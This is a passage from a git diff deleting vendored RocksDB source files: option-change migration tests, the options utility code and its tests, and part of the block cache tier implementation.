-    ASSERT_TRUE(!it->Valid());
-  }
-}
-
-TEST_P(DBOptionChangeMigrationTests, Migrate3) {
-  Options old_options = CurrentOptions();
-  old_options.compaction_style =
-      static_cast<CompactionStyle>(compaction_style1_);
-  if (old_options.compaction_style == CompactionStyle::kCompactionStyleLevel) {
-    old_options.level_compaction_dynamic_level_bytes = is_dynamic1_;
-  }
-
-  old_options.level0_file_num_compaction_trigger = 3;
-  old_options.write_buffer_size = 64 * 1024;
-  old_options.target_file_size_base = 128 * 1024;
-  // Make level target of L1, L2 to be 200KB and 600KB
-  old_options.num_levels = level1_;
-  old_options.max_bytes_for_level_multiplier = 3;
-  old_options.max_bytes_for_level_base = 200 * 1024;
-
-  Reopen(old_options);
-  Random rnd(301);
-  for (int num = 0; num < 20; num++) {
-    for (int i = 0; i < 50; i++) {
-      ASSERT_OK(Put(Key(num * 100 + i), RandomString(&rnd, 900)));
-    }
-    Flush();
-    dbfull()->TEST_WaitForCompact();
-    if (num == 9) {
-      // Issue a full compaction to generate some zero-out files
-      CompactRangeOptions cro;
-      cro.bottommost_level_compaction = BottommostLevelCompaction::kForce;
-      dbfull()->CompactRange(cro, nullptr, nullptr);
-    }
-  }
-  dbfull()->TEST_WaitForFlushMemTable();
-  dbfull()->TEST_WaitForCompact();
-
-  // Will make sure exactly those keys are in the DB after migration.
-  std::set<std::string> keys;
-  {
-    std::unique_ptr<Iterator> it(db_->NewIterator(ReadOptions()));
-    it->SeekToFirst();
-    for (; it->Valid(); it->Next()) {
-      keys.insert(it->key().ToString());
-    }
-  }
-  Close();
-
-  Options new_options = old_options;
-  new_options.compaction_style =
-      static_cast<CompactionStyle>(compaction_style2_);
-  if (new_options.compaction_style == CompactionStyle::kCompactionStyleLevel) {
-    new_options.level_compaction_dynamic_level_bytes = is_dynamic2_;
-  }
-  new_options.target_file_size_base = 256 * 1024;
-  new_options.num_levels = level2_;
-  new_options.max_bytes_for_level_base = 150 * 1024;
-  new_options.max_bytes_for_level_multiplier = 4;
-  ASSERT_OK(OptionChangeMigration(dbname_, old_options, new_options));
-  Reopen(new_options);
-
-  // Wait for compaction to finish and make sure it can reopen
-  dbfull()->TEST_WaitForFlushMemTable();
-  dbfull()->TEST_WaitForCompact();
-  Reopen(new_options);
-
-  {
-    std::unique_ptr<Iterator> it(db_->NewIterator(ReadOptions()));
-    it->SeekToFirst();
-    for (std::string key : keys) {
-      ASSERT_TRUE(it->Valid());
-      ASSERT_EQ(key, it->key().ToString());
-      it->Next();
-    }
-    ASSERT_TRUE(!it->Valid());
-  }
-}
-
-TEST_P(DBOptionChangeMigrationTests, Migrate4) {
-  Options old_options = CurrentOptions();
-  old_options.compaction_style =
-      static_cast<CompactionStyle>(compaction_style2_);
-  if (old_options.compaction_style == CompactionStyle::kCompactionStyleLevel) {
-    old_options.level_compaction_dynamic_level_bytes = is_dynamic2_;
-  }
-  old_options.level0_file_num_compaction_trigger = 3;
-  old_options.write_buffer_size = 64 * 1024;
-  old_options.target_file_size_base = 128 * 1024;
-  // Make level target of L1, L2 to be 200KB and 600KB
-  old_options.num_levels = level2_;
-  old_options.max_bytes_for_level_multiplier = 3;
-  old_options.max_bytes_for_level_base = 200 * 1024;
-
-  Reopen(old_options);
-  Random rnd(301);
-  for (int num = 0; num < 20; num++) {
-    for (int i = 0; i < 50; i++) {
-      ASSERT_OK(Put(Key(num * 100 + i), RandomString(&rnd, 900)));
-    }
-    Flush();
-    dbfull()->TEST_WaitForCompact();
-    if (num == 9) {
-      // Issue a full compaction to generate some zero-out files
-      CompactRangeOptions cro;
-      cro.bottommost_level_compaction = BottommostLevelCompaction::kForce;
-      dbfull()->CompactRange(cro, nullptr, nullptr);
-    }
-  }
-  dbfull()->TEST_WaitForFlushMemTable();
-  dbfull()->TEST_WaitForCompact();
-
-  // Will make sure exactly those keys are in the DB after migration.
-  std::set<std::string> keys;
-  {
-    std::unique_ptr<Iterator> it(db_->NewIterator(ReadOptions()));
-    it->SeekToFirst();
-    for (; it->Valid(); it->Next()) {
-      keys.insert(it->key().ToString());
-    }
-  }
-
-  Close();
-
-  Options new_options = old_options;
-  new_options.compaction_style =
-      static_cast<CompactionStyle>(compaction_style1_);
-  if (new_options.compaction_style == CompactionStyle::kCompactionStyleLevel) {
-    new_options.level_compaction_dynamic_level_bytes = is_dynamic1_;
-  }
-  new_options.target_file_size_base = 256 * 1024;
-  new_options.num_levels = level1_;
-  new_options.max_bytes_for_level_base = 150 * 1024;
-  new_options.max_bytes_for_level_multiplier = 4;
-  ASSERT_OK(OptionChangeMigration(dbname_, old_options, new_options));
-  Reopen(new_options);
-  // Wait for compaction to finish and make sure it can reopen
-  dbfull()->TEST_WaitForFlushMemTable();
-  dbfull()->TEST_WaitForCompact();
-  Reopen(new_options);
-
-  {
-    std::unique_ptr<Iterator> it(db_->NewIterator(ReadOptions()));
-    it->SeekToFirst();
-    for (std::string key : keys) {
-      ASSERT_TRUE(it->Valid());
-      ASSERT_EQ(key, it->key().ToString());
-      it->Next();
-    }
-    ASSERT_TRUE(!it->Valid());
-  }
-}
-
-INSTANTIATE_TEST_CASE_P(
-    DBOptionChangeMigrationTests, DBOptionChangeMigrationTests,
-    ::testing::Values(std::make_tuple(3, 0, false, 4, 0, false),
-                      std::make_tuple(3, 0, true, 4, 0, true),
-                      std::make_tuple(3, 0, true, 4, 0, false),
-                      std::make_tuple(3, 0, false, 4, 0, true),
-                      std::make_tuple(3, 1, false, 4, 1, false),
-                      std::make_tuple(1, 1, false, 4, 1, false),
-                      std::make_tuple(3, 0, false, 4, 1, false),
-                      std::make_tuple(3, 0, false, 1, 1, false),
-                      std::make_tuple(3, 0, true, 4, 1, false),
-                      std::make_tuple(3, 0, true, 1, 1, false),
-                      std::make_tuple(1, 1, false, 4, 0, false),
-                      std::make_tuple(4, 0, false, 1, 2, false),
-                      std::make_tuple(3, 0, true, 2, 2, false),
-                      std::make_tuple(3, 1, false, 3, 2, false),
-                      std::make_tuple(1, 1, false, 4, 2, false)));
-
-class DBOptionChangeMigrationTest : public DBTestBase {
- public:
-  DBOptionChangeMigrationTest()
-      : DBTestBase("/db_option_change_migration_test2") {}
-};
-
-TEST_F(DBOptionChangeMigrationTest, CompactedSrcToUniversal) {
-  Options old_options = CurrentOptions();
-  old_options.compaction_style = CompactionStyle::kCompactionStyleLevel;
-  old_options.max_compaction_bytes = 200 * 1024;
-  old_options.level_compaction_dynamic_level_bytes = false;
-  old_options.level0_file_num_compaction_trigger = 3;
-  old_options.write_buffer_size = 64 * 1024;
-  old_options.target_file_size_base = 128 * 1024;
-  // Make level target of L1, L2 to be 200KB and 600KB
-  old_options.num_levels = 4;
-  old_options.max_bytes_for_level_multiplier = 3;
-  old_options.max_bytes_for_level_base = 200 * 1024;
-
-  Reopen(old_options);
-  Random rnd(301);
-  for (int num = 0; num < 20; num++) {
-    for (int i = 0; i < 50; i++) {
-      ASSERT_OK(Put(Key(num * 100 + i), RandomString(&rnd, 900)));
-    }
-  }
-  Flush();
-  CompactRangeOptions cro;
-  cro.bottommost_level_compaction = BottommostLevelCompaction::kForce;
-  dbfull()->CompactRange(cro, nullptr, nullptr);
-
-  // Will make sure exactly those keys are in the DB after migration.
-  std::set<std::string> keys;
-  {
-    std::unique_ptr<Iterator> it(db_->NewIterator(ReadOptions()));
-    it->SeekToFirst();
-    for (; it->Valid(); it->Next()) {
-      keys.insert(it->key().ToString());
-    }
-  }
-
-  Close();
-
-  Options new_options = old_options;
-  new_options.compaction_style = CompactionStyle::kCompactionStyleUniversal;
-  new_options.target_file_size_base = 256 * 1024;
-  new_options.num_levels = 1;
-  new_options.max_bytes_for_level_base = 150 * 1024;
-  new_options.max_bytes_for_level_multiplier = 4;
-  ASSERT_OK(OptionChangeMigration(dbname_, old_options, new_options));
-  Reopen(new_options);
-  // Wait for compaction to finish and make sure it can reopen
-  dbfull()->TEST_WaitForFlushMemTable();
-  dbfull()->TEST_WaitForCompact();
-  Reopen(new_options);
-
-  {
-    std::unique_ptr<Iterator> it(db_->NewIterator(ReadOptions()));
-    it->SeekToFirst();
-    for (std::string key : keys) {
-      ASSERT_TRUE(it->Valid());
-      ASSERT_EQ(key, it->key().ToString());
-      it->Next();
-    }
-    ASSERT_TRUE(!it->Valid());
-  }
-}
-
-#endif  // ROCKSDB_LITE
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/utilities/options/options_util.cc b/thirdparty/rocksdb/utilities/options/options_util.cc
deleted file mode 100644
index 2173492..0000000
--- a/thirdparty/rocksdb/utilities/options/options_util.cc
+++ /dev/null
@@ -1,102 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/utilities/options_util.h"
-
-#include "options/options_parser.h"
-#include "rocksdb/options.h"
-#include "util/filename.h"
-
-namespace rocksdb {
-Status LoadOptionsFromFile(const std::string& file_name, Env* env,
-                           DBOptions* db_options,
-                           std::vector<ColumnFamilyDescriptor>* cf_descs,
-                           bool ignore_unknown_options) {
-  RocksDBOptionsParser parser;
-  Status s = parser.Parse(file_name, env, ignore_unknown_options);
-  if (!s.ok()) {
-    return s;
-  }
-
-  *db_options = *parser.db_opt();
-
-  const std::vector<std::string>& cf_names = *parser.cf_names();
-  const std::vector<ColumnFamilyOptions>& cf_opts = *parser.cf_opts();
-  cf_descs->clear();
-  for (size_t i = 0; i < cf_opts.size(); ++i) {
-    cf_descs->push_back({cf_names[i], cf_opts[i]});
-  }
-  return Status::OK();
-}
-
-Status GetLatestOptionsFileName(const std::string& dbpath,
-                                Env* env, std::string* options_file_name) {
-  Status s;
-  std::string latest_file_name;
-  uint64_t latest_time_stamp = 0;
-  std::vector<std::string> file_names;
-  s = env->GetChildren(dbpath, &file_names);
-  if (!s.ok()) {
-    return s;
-  }
-  for (auto& file_name : file_names) {
-    uint64_t time_stamp;
-    FileType type;
-    if (ParseFileName(file_name, &time_stamp, &type) && type == kOptionsFile) {
-      if (time_stamp > latest_time_stamp) {
-        latest_time_stamp = time_stamp;
-        latest_file_name = file_name;
-      }
-    }
-  }
-  if (latest_file_name.size() == 0) {
-    return Status::NotFound("No options files found in the DB directory.");
-  }
-  *options_file_name = latest_file_name;
-  return Status::OK();
-}
-
-Status LoadLatestOptions(const std::string& dbpath, Env* env,
-                         DBOptions* db_options,
-                         std::vector<ColumnFamilyDescriptor>* cf_descs,
-                         bool ignore_unknown_options) {
-  std::string options_file_name;
-  Status s = GetLatestOptionsFileName(dbpath, env, &options_file_name);
-  if (!s.ok()) {
-    return s;
-  }
-
-  return LoadOptionsFromFile(dbpath + "/" + options_file_name, env, db_options,
-                             cf_descs, ignore_unknown_options);
-}
-
-Status CheckOptionsCompatibility(
-    const std::string& dbpath, Env* env, const DBOptions& db_options,
-    const std::vector<ColumnFamilyDescriptor>& cf_descs,
-    bool ignore_unknown_options) {
-  std::string options_file_name;
-  Status s = GetLatestOptionsFileName(dbpath, env, &options_file_name);
-  if (!s.ok()) {
-    return s;
-  }
-
-  std::vector<std::string> cf_names;
-  std::vector<ColumnFamilyOptions> cf_opts;
-  for (const auto& cf_desc : cf_descs) {
-    cf_names.push_back(cf_desc.name);
-    cf_opts.push_back(cf_desc.options);
-  }
-
-  const OptionsSanityCheckLevel kDefaultLevel = kSanityLevelLooselyCompatible;
-
-  return RocksDBOptionsParser::VerifyRocksDBOptionsFromFile(
-      db_options, cf_names, cf_opts, dbpath + "/" + options_file_name, env,
-      kDefaultLevel, ignore_unknown_options);
-}
-
-}  // namespace rocksdb
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/options/options_util_test.cc b/thirdparty/rocksdb/utilities/options/options_util_test.cc
deleted file mode 100644
index 2ca8d47..0000000
--- a/thirdparty/rocksdb/utilities/options/options_util_test.cc
+++ /dev/null
@@ -1,317 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-
-#include <cctype>
-#include <unordered_map>
-
-#include "options/options_parser.h"
-#include "rocksdb/db.h"
-#include "rocksdb/table.h"
-#include "rocksdb/utilities/options_util.h"
-#include "util/random.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-#ifndef GFLAGS
-bool FLAGS_enable_print = false;
-#else
-#include <gflags/gflags.h>
-using GFLAGS::ParseCommandLineFlags;
-DEFINE_bool(enable_print, false, "Print options generated to console.");
-#endif  // GFLAGS
-
-namespace rocksdb {
-class OptionsUtilTest : public testing::Test {
- public:
-  OptionsUtilTest() : rnd_(0xFB) {
-    env_.reset(new test::StringEnv(Env::Default()));
-    dbname_ = test::TmpDir() + "/options_util_test";
-  }
-
- protected:
-  std::unique_ptr<test::StringEnv> env_;
-  std::string dbname_;
-  Random rnd_;
-};
-
-bool IsBlockBasedTableFactory(TableFactory* tf) {
-  return tf->Name() == BlockBasedTableFactory().Name();
-}
-
-TEST_F(OptionsUtilTest, SaveAndLoad) {
-  const size_t kCFCount = 5;
-
-  DBOptions db_opt;
-  std::vector<std::string> cf_names;
-  std::vector<ColumnFamilyOptions> cf_opts;
-  test::RandomInitDBOptions(&db_opt, &rnd_);
-  for (size_t i = 0; i < kCFCount; ++i) {
-    cf_names.push_back(i == 0 ? kDefaultColumnFamilyName
-                              : test::RandomName(&rnd_, 10));
-    cf_opts.emplace_back();
-    test::RandomInitCFOptions(&cf_opts.back(), &rnd_);
-  }
-
-  const std::string kFileName = "OPTIONS-123456";
-  PersistRocksDBOptions(db_opt, cf_names, cf_opts, kFileName, env_.get());
-
-  DBOptions loaded_db_opt;
-  std::vector<ColumnFamilyDescriptor> loaded_cf_descs;
-  ASSERT_OK(LoadOptionsFromFile(kFileName, env_.get(), &loaded_db_opt,
-                                &loaded_cf_descs));
-
-  ASSERT_OK(RocksDBOptionsParser::VerifyDBOptions(db_opt, loaded_db_opt));
-  test::RandomInitDBOptions(&db_opt, &rnd_);
-  ASSERT_NOK(RocksDBOptionsParser::VerifyDBOptions(db_opt, loaded_db_opt));
-
-  for (size_t i = 0; i < kCFCount; ++i) {
-    ASSERT_EQ(cf_names[i], loaded_cf_descs[i].name);
-    ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(
-        cf_opts[i], loaded_cf_descs[i].options));
-    if (IsBlockBasedTableFactory(cf_opts[i].table_factory.get())) {
-      ASSERT_OK(RocksDBOptionsParser::VerifyTableFactory(
-          cf_opts[i].table_factory.get(),
-          loaded_cf_descs[i].options.table_factory.get()));
-    }
-    test::RandomInitCFOptions(&cf_opts[i], &rnd_);
-    ASSERT_NOK(RocksDBOptionsParser::VerifyCFOptions(
-        cf_opts[i], loaded_cf_descs[i].options));
-  }
-
-  for (size_t i = 0; i < kCFCount; ++i) {
-    if (cf_opts[i].compaction_filter) {
-      delete cf_opts[i].compaction_filter;
-    }
-  }
-}
-
-namespace {
-class DummyTableFactory : public TableFactory {
- public:
-  DummyTableFactory() {}
-  virtual ~DummyTableFactory() {}
-
-  virtual const char* Name() const override { return "DummyTableFactory"; }
-
-  virtual Status NewTableReader(
-      const TableReaderOptions& table_reader_options,
-      unique_ptr<RandomAccessFileReader>&& file, uint64_t file_size,
-      unique_ptr<TableReader>* table_reader,
-      bool prefetch_index_and_filter_in_cache) const override {
-    return Status::NotSupported();
-  }
-
-  virtual TableBuilder* NewTableBuilder(
-      const TableBuilderOptions& table_builder_options,
-      uint32_t column_family_id, WritableFileWriter* file) const override {
-    return nullptr;
-  }
-
-  virtual Status SanitizeOptions(
-      const DBOptions& db_opts,
-      const ColumnFamilyOptions& cf_opts) const override {
-    return Status::NotSupported();
-  }
-
-  virtual std::string GetPrintableTableOptions() const override { return ""; }
-
-  Status GetOptionString(std::string* opt_string,
-                         const std::string& delimiter) const override {
-    return Status::OK();
-  }
-};
-
-class DummyMergeOperator : public MergeOperator {
- public:
-  DummyMergeOperator() {}
-  virtual ~DummyMergeOperator() {}
-
-  virtual bool FullMergeV2(const MergeOperationInput& merge_in,
-                           MergeOperationOutput* merge_out) const override {
-    return false;
-  }
-
-  virtual bool PartialMergeMulti(const Slice& key,
-                                 const std::deque<Slice>& operand_list,
-                                 std::string* new_value,
-                                 Logger* logger) const override {
-    return false;
-  }
-
-  virtual const char* Name() const override { return "DummyMergeOperator"; }
-};
-
-class DummySliceTransform : public SliceTransform {
- public:
-  DummySliceTransform() {}
-  virtual ~DummySliceTransform() {}
-
-  // Return the name of this transformation.
-  virtual const char* Name() const { return "DummySliceTransform"; }
-
-  // transform a src in domain to a dst in the range
-  virtual Slice Transform(const Slice& src) const { return src; }
-
-  // determine whether this is a valid src upon the function applies
-  virtual bool InDomain(const Slice& src) const { return false; }
-
-  // determine whether dst=Transform(src) for some src
-  virtual bool InRange(const Slice& dst) const { return false; }
-};
-
-}  // namespace
-
-TEST_F(OptionsUtilTest, SanityCheck) {
-  DBOptions db_opt;
-  std::vector<ColumnFamilyDescriptor> cf_descs;
-  const size_t kCFCount = 5;
-  for (size_t i = 0; i < kCFCount; ++i) {
-    cf_descs.emplace_back();
-    cf_descs.back().name =
-        (i == 0) ? kDefaultColumnFamilyName : test::RandomName(&rnd_, 10);
-
-    cf_descs.back().options.table_factory.reset(NewBlockBasedTableFactory());
-    // Assign non-null values to prefix_extractors except the first cf.
-    cf_descs.back().options.prefix_extractor.reset(
-        i != 0 ? test::RandomSliceTransform(&rnd_) : nullptr);
-    cf_descs.back().options.merge_operator.reset(
-        test::RandomMergeOperator(&rnd_));
-  }
-
-  db_opt.create_missing_column_families = true;
-  db_opt.create_if_missing = true;
-
-  DestroyDB(dbname_, Options(db_opt, cf_descs[0].options));
-  DB* db;
-  std::vector<ColumnFamilyHandle*> handles;
-  // open and persist the options
-  ASSERT_OK(DB::Open(db_opt, dbname_, cf_descs, &handles, &db));
-
-  // close the db
-  for (auto* handle : handles) {
-    delete handle;
-  }
-  delete db;
-
-  // perform sanity check
-  ASSERT_OK(
-      CheckOptionsCompatibility(dbname_, Env::Default(), db_opt, cf_descs));
-
-  ASSERT_GE(kCFCount, 5);
-  // merge operator
-  {
-    std::shared_ptr<MergeOperator> merge_op =
-        cf_descs[0].options.merge_operator;
-
-    ASSERT_NE(merge_op.get(), nullptr);
-    cf_descs[0].options.merge_operator.reset();
-    ASSERT_NOK(
-        CheckOptionsCompatibility(dbname_, Env::Default(), db_opt, cf_descs));
-
-    cf_descs[0].options.merge_operator.reset(new DummyMergeOperator());
-    ASSERT_NOK(
-        CheckOptionsCompatibility(dbname_, Env::Default(), db_opt, cf_descs));
-
-    cf_descs[0].options.merge_operator = merge_op;
-    ASSERT_OK(
-        CheckOptionsCompatibility(dbname_, Env::Default(), db_opt, cf_descs));
-  }
-
-  // prefix extractor
-  {
-    std::shared_ptr<const SliceTransform> prefix_extractor =
-        cf_descs[1].options.prefix_extractor;
-
-    // It's okay to set prefix_extractor to nullptr.
-    ASSERT_NE(prefix_extractor, nullptr);
-    cf_descs[1].options.prefix_extractor.reset();
-    ASSERT_OK(
-        CheckOptionsCompatibility(dbname_, Env::Default(), db_opt, cf_descs));
-
-    cf_descs[1].options.prefix_extractor.reset(new DummySliceTransform());
-    ASSERT_OK(
-        CheckOptionsCompatibility(dbname_, Env::Default(), db_opt, cf_descs));
-
-    cf_descs[1].options.prefix_extractor = prefix_extractor;
-    ASSERT_OK(
-        CheckOptionsCompatibility(dbname_, Env::Default(), db_opt, cf_descs));
-  }
-
-  // prefix extractor nullptr case
-  {
-    std::shared_ptr<const SliceTransform> prefix_extractor =
-        cf_descs[0].options.prefix_extractor;
-
-    // It's okay to set prefix_extractor to nullptr.
-    ASSERT_EQ(prefix_extractor, nullptr);
-    cf_descs[0].options.prefix_extractor.reset();
-    ASSERT_OK(
-        CheckOptionsCompatibility(dbname_, Env::Default(), db_opt, cf_descs));
-
-    // It's okay to change prefix_extractor from nullptr to non-nullptr
-    cf_descs[0].options.prefix_extractor.reset(new DummySliceTransform());
-    ASSERT_OK(
-        CheckOptionsCompatibility(dbname_, Env::Default(), db_opt, cf_descs));
-
-    cf_descs[0].options.prefix_extractor = prefix_extractor;
-    ASSERT_OK(
-        CheckOptionsCompatibility(dbname_, Env::Default(), db_opt, cf_descs));
-  }
-
-  // comparator
-  {
-    test::SimpleSuffixReverseComparator comparator;
-
-    auto* prev_comparator = cf_descs[2].options.comparator;
-    cf_descs[2].options.comparator = &comparator;
-    ASSERT_NOK(
-        CheckOptionsCompatibility(dbname_, Env::Default(), db_opt, cf_descs));
-
-    cf_descs[2].options.comparator = prev_comparator;
-    ASSERT_OK(
-        CheckOptionsCompatibility(dbname_, Env::Default(), db_opt, cf_descs));
-  }
-
-  // table factory
-  {
-    std::shared_ptr<TableFactory> table_factory =
-        cf_descs[3].options.table_factory;
-
-    ASSERT_NE(table_factory, nullptr);
-    cf_descs[3].options.table_factory.reset(new DummyTableFactory());
-    ASSERT_NOK(
-        CheckOptionsCompatibility(dbname_, Env::Default(), db_opt, cf_descs));
-
-    cf_descs[3].options.table_factory = table_factory;
-    ASSERT_OK(
-        CheckOptionsCompatibility(dbname_, Env::Default(), db_opt, cf_descs));
-  }
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-#ifdef GFLAGS
-  ParseCommandLineFlags(&argc, &argv, true);
-#endif  // GFLAGS
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <cstdio>
-
-int main(int argc, char** argv) {
-  printf("Skipped in RocksDBLite as utilities are not supported.\n");
-  return 0;
-}
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/persistent_cache/block_cache_tier.cc b/thirdparty/rocksdb/utilities/persistent_cache/block_cache_tier.cc
deleted file mode 100644
index 714af2c..0000000
--- a/thirdparty/rocksdb/utilities/persistent_cache/block_cache_tier.cc
+++ /dev/null
@@ -1,425 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#ifndef ROCKSDB_LITE
-
-#include "utilities/persistent_cache/block_cache_tier.h"
-
-#include <regex>
-#include <utility>
-#include <vector>
-
-#include "port/port.h"
-#include "util/logging.h"
-#include "util/stop_watch.h"
-#include "util/sync_point.h"
-#include "utilities/persistent_cache/block_cache_tier_file.h"
-
-namespace rocksdb {
-
-//
-// BlockCacheImpl
-//
-Status BlockCacheTier::Open() {
-  Status status;
-
-  WriteLock _(&lock_);
-
-  assert(!size_);
-
-  // Check the validity of the options
-  status = opt_.ValidateSettings();
-  assert(status.ok());
-  if (!status.ok()) {
-    Error(opt_.log, "Invalid block cache options");
-    return status;
-  }
-
-  // Create base directory or cleanup existing directory
-  status = opt_.env->CreateDirIfMissing(opt_.path);
-  if (!status.ok()) {
-    Error(opt_.log, "Error creating directory %s. %s", opt_.path.c_str(),
-          status.ToString().c_str());
-    return status;
-  }
-
-  // Create base/<cache dir> directory
-  status = opt_.env->CreateDir(GetCachePath());
-  if (!status.ok()) {
-    // directory already exists, clean it up
-    status = CleanupCacheFolder(GetCachePath());
-    assert(status.ok());
-    if (!status.ok()) {
-      Error(opt_.log, "Error creating directory %s. %s", opt_.path.c_str(),
-            status.ToString().c_str());
-      return status;
-    }
-  }
-
-  // create a new file
-  assert(!cache_file_);
-  status = NewCacheFile();
-  if (!status.ok()) {
-    Error(opt_.log, "Error creating new file %s. %s", opt_.path.c_str(),
-          status.ToString().c_str());
-    return status;
-  }
-
-  assert(cache_file_);
-
-  if (opt_.pipeline_writes) {
-    assert(!insert_th_.joinable());
-    insert_th_ = port::Thread(&BlockCacheTier::InsertMain, this);
-  }
-
-  return Status::OK();
-}
-
-bool IsCacheFile(const std::string& file) {
-  // check if the file has .rc suffix
-  // Unfortunately regex support across compilers is not even, so we use simple
-  // string parsing
-  size_t pos = file.find(".");
-  if (pos == std::string::npos) {
-    return false;
-  }
-
-  std::string suffix = file.substr(pos);
-  return suffix == ".rc";
-}
-
-Status BlockCacheTier::CleanupCacheFolder(const std::string& folder) {
-  std::vector<std::string> files;
-  Status status = opt_.env->GetChildren(folder, &files);
-  if (!status.ok()) {
-    Error(opt_.log, "Error getting files for %s. %s", folder.c_str(),
-          status.ToString().c_str());
-    return status;
-  }
-
-  // cleanup files with the patter :digi:.rc
-  for (auto file : files) {
-    if (IsCacheFile(file)) {
-      // cache file
-      Info(opt_.log, "Removing file %s.", file.c_str());
-      status = opt_.env->DeleteFile(folder + "/" + file);
-      if (!status.ok()) {
-        Error(opt_.log, "Error deleting file %s. %s", file.c_str(),
-              status.ToString().c_str());
-        return status;
-      }
-    } else {
-      ROCKS_LOG_DEBUG(opt_.log, "Skipping file %s", file.c_str());
-    }
-  }
-  return Status::OK();
-}
-
-Status BlockCacheTier::Close() {
-  // stop the insert thread
-  if (opt_.pipeline_writes && insert_th_.joinable()) {
-    InsertOp op(/*quit=*/true);
-    insert_ops_.Push(std::move(op));
-    insert_th_.join();
-  }
-
-  // stop the writer before
-  writer_.Stop();
-
-  // clear all metadata
-  WriteLock _(&lock_);
-  metadata_.Clear();
-  return Status::OK();
-}
-
-template<class T>
-void Add(std::map<std::string, double>* stats, const std::string& key,
-         const T& t) {
-  stats->insert({key, static_cast<double>(t)});
-}
-
-PersistentCache::StatsType BlockCacheTier::Stats() {
-  std::map<std::string, double> stats;
-  Add(&stats, "persistentcache.blockcachetier.bytes_piplined",
-      stats_.bytes_pipelined_.Average());
-  Add(&stats, "persistentcache.blockcachetier.bytes_written",
-      stats_.bytes_written_.Average());
-  Add(&stats, "persistentcache.blockcachetier.bytes_read",
-      stats_.bytes_read_.Average());
-  Add(&stats, "persistentcache.blockcachetier.insert_dropped",
-      stats_.insert_dropped_);
-  Add(&stats, "persistentcache.blockcachetier.cache_hits",
-      stats_.cache_hits_);
-  Add(&stats, "persistentcache.blockcachetier.cache_misses",
-      stats_.cache_misses_);
-  Add(&stats, "persistentcache.blockcachetier.cache_errors",
-      stats_.cache_errors_);
-  Add(&stats, "persistentcache.blockcachetier.cache_hits_pct",
-      stats_.CacheHitPct());
-  Add(&stats, "persistentcache.blockcachetier.cache_misses_pct",
-      stats_.CacheMissPct());
-  Add(&stats, "persistentcache.blockcachetier.read_hit_latency",
-      stats_.read_hit_latency_.Average());
-  Add(&stats, "persistentcache.blockcachetier.read_miss_latency",
-      stats_.read_miss_latency_.Average());
-  Add(&stats, "persistenetcache.blockcachetier.write_latency",
-      stats_.write_latency_.Average());
-
-  auto out = PersistentCacheTier::Stats();
-  out.push_back(stats);
-  return out;
-}
-
-Status BlockCacheTier::Insert(const Slice& key, const char* data,
-                              const size_t size) {
-  // update stats
-  stats_.bytes_pipelined_.Add(size);
-
-  if (opt_.pipeline_writes) {
-    // off load the write to the write thread
-    insert_ops_.Push(
-        InsertOp(key.ToString(), std::move(std::string(data, size))));
-    return Status::OK();
-  }
-
-  assert(!opt_.pipeline_writes);
-  return InsertImpl(key, Slice(data, size));
-}
-
-void BlockCacheTier::InsertMain() {
-  while (true) {
-    InsertOp op(insert_ops_.Pop());
-
-    if (op.signal_) {
-      // that is a secret signal to exit
-      break;
-    }
-
-    size_t retry = 0;
-    Status s;
-    while ((s = InsertImpl(Slice(op.key_), Slice(op.data_))).IsTryAgain()) {
-      if (retry > kMaxRetry) {
-        break;
-      }
-
-      // this can happen when the buffers are full, we wait till some buffers
-      // are free. Why don't we wait inside the code. This is because we want
-      // to support both pipelined and non-pipelined mode
-      buffer_allocator_.WaitUntilUsable();
-      retry++;
-    }
-
-    if (!s.ok()) {
-      stats_.insert_dropped_++;
-    }
-  }
-}
-
-Status BlockCacheTier::InsertImpl(const Slice& key, const Slice& data) {
-  // pre-condition
-  assert(key.size());
-  assert(data.size());
-  assert(cache_file_);
-
-  StopWatchNano timer(opt_.env, /*auto_start=*/ true);
-
-  WriteLock _(&lock_);
-
-  LBA lba;
-  if (metadata_.Lookup(key, &lba)) {
-    // the key already exists, this is duplicate insert
-    return Status::OK();
-  }
-
-  while (!cache_file_->Append(key, data, &lba)) {
-    if (!cache_file_->Eof()) {
-      ROCKS_LOG_DEBUG(opt_.log, "Error inserting to cache file %d",
-                      cache_file_->cacheid());
-      stats_.write_latency_.Add(timer.ElapsedNanos() / 1000);
-      return Status::TryAgain();
-    }
-
-    assert(cache_file_->Eof());
-    Status status = NewCacheFile();
-    if (!status.ok()) {
-      return status;
-    }
-  }
-
-  // Insert into lookup index
-  BlockInfo* info = metadata_.Insert(key, lba);
-  assert(info);
-  if (!info) {
-    return Status::IOError("Unexpected error inserting to index");
-  }
-
-  // insert to cache file reverse mapping
-  cache_file_->Add(info);
-
-  // update stats
-  stats_.bytes_written_.Add(data.size());
-  stats_.write_latency_.Add(timer.ElapsedNanos() / 1000);
-  return Status::OK();
-}
-
-Status BlockCacheTier::Lookup(const Slice& key, unique_ptr<char[]>* val,
-                              size_t* size) {
-  StopWatchNano timer(opt_.env, /*auto_start=*/ true);
-
-  LBA lba;
-  bool status;
-  status = metadata_.Lookup(key, &lba);
-  if (!status) {
-    stats_.cache_misses_++;
